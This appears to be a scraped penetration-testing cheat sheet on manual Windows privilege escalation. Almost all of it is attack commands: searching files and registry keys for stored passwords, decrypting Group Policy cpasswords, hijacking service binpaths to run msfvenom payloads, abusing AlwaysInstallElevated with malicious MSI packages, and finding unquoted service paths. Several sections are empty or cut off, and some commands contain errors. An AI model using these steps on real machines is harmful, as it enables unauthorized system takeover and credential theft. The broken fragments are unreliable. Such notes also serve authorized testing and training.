Windows
manual techniques for privilege escalation
Last updated
Was this helpful?
manual techniques for privilege escalation
Last updated
Was this helpful?
First step should always be Situational Awareness, understand what's on the host. Please use those commands first to understand what you're against.
dir/s *pass* == *cred* == *vnc* == *.config*
findstr /si
password *.xml *.ini*.txt
/i -
incase sensitive , /s
- search subdirectories
reg query HKLM(HKCU) /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s > HKLM.txt
reg query HKCU /f password /t REG_SZ /s > HLCU.txt
Note: be careful querying the registry as there is usually alerting tied to it
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
dir file.txt /s /p
The /s option directs a search of all folders on the hard drive; the /p option pauses the display after each screen of text.
can also do dir *.txt /s /p
search in a file:
find /i TEXT C:\*.txt
/i - incase sensetive
Find based on Regular expressions
findstr /Ri /c:"user-." .txt file.txt:user-0111
Search for any vulnaribilies that weren't patched, and the patch wasn't applid to the host.
Use wmi to find what patches were applied:
wmic qfe get Caption,Description,HotFixID,InstalledOn
And find the patches that were not applied yet (shows as 'update')
Use use post/windows/gather/enum_patches
Find the Domain Controller and browse to \\DC\SYSVOL\
find all the passwords by searching the following files:
obtain the value of the attribute cpassword.
post/windows/gather/credentials/gpp
Use the Get-GPPPassword
which is under Exfiltration
Or the Get-CachedGPPPassword
For locally stored GP Files which is part of 'PowerView'
Decrypt the password using the Kali built in tool called gpp-decrypt that will do it:
root@kali:~# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
We are looking for tasks that are run by a privileged user and we can change their commands or paths.
Open task scheduler:
taskschd.msc
control schedtasks
Output for all tasks:
schtasks /query /fo LIST /v > tasks.txt
Or in a Table:
schtasks /query /fo TABLE
Specific task:
schtasks/query /fo LIST /v /tn TaskName
Start Scheduled tasks:
PS> Start-ScheduledTask -TaskName "ScanSoftware"
Stop Scheduled task:
PS> Stop-ScheduledTask -TaskName "ScanSoftware"
PowerUP
Get-ModifiableScheduledTaskFile
net start
Viewing Service ACLs using powershell
Use the Get-ServiceACL script, and run:
'FakeService' | Get‐ServiceAcl | Select‐Object ‐ExpandProperty Access
If the service permissions allow us to start stop or change config we can modify the service permissions.
Checking Folder Permissions:
accesschk.exe -dqv C:\Some\Path
accesschk.exe -dvq UserGroup c:\
accesschk.exe -ucqv ServiceName
accesschk.exe -ucvq* <Any_Service>
Check Service Write Access:
accesschk.exe -uwcqv UserGroup*
Let's enumerate services with accesschk from SysInternals and look for SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG as these privileges allow attackers to modify service configuration:
accesschk.exe /accepteula -ucv "user" evilsvc
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
We can see the user 'user' has 'SERVICE_ALL_ACCESS' to the service 'evilsec'
Create a malicious binary using msfvenom and point the services:
.\sc.exe config evilsvc binpath= "c:\program.exe"
(Run hanlder)
Start the service:
.\sc.exe start evilsvc
Or
net stop [service name] && net start [service name].
exploit/windows/local/service_permissions
# NOTE: spaces are mandatory for this exploit to work !
Group Policy Setting that allows any *.msi to install with elevated privilege
Attack: Compile payload as *.msi
The easiest method to determine if this issue exist on the host is to query the following registry keys:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
The easiest and the fastest way to escalate privileges is via the Metasploit Framework which contains a module that can generate an MSI package with a simple payload that it will be executed as SYSTEM on the target host and it will be removed automatically to prevent the installation of being registered with the operating system.
PowerSploit framework contains a script that can discover whether this issue exist on the host by checking the registry entries and another one that can generate an MSI file that will add a user account into the local administrators group.
Example for vulnerable paths:
C:\Defcon\Vuln
Folder 1\anything.exe
C:\Defcon\Vuln Folder
1\anything.exe
C:\Defcon\Vuln Folder 1\anything.exe
Searching for Unquoted Service Paths:
Cmd:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Powershell:
It is very common for administrators to use Windows Deployment Services in order to create an image of a Windows operating system and deploy this image in various systems through the network. This is called unattended installation.
The problem with unattended installations is that the local administrator password is stored in various locations either in plaintext or as Base-64 encoded. These locations are:
post/windows/gather/enum_unattend
can enumerate missing patches.
Group Policy Preference (GPP) is created, there’s an xml file created in the SYSVOL share with that config data, including any passwords associated with the GPP. For security, Microsoft AES encrypts the password before it’s stored as cpassword. But then Microsoft on MSDN
Can be done using - a sysinternal tool
Credit;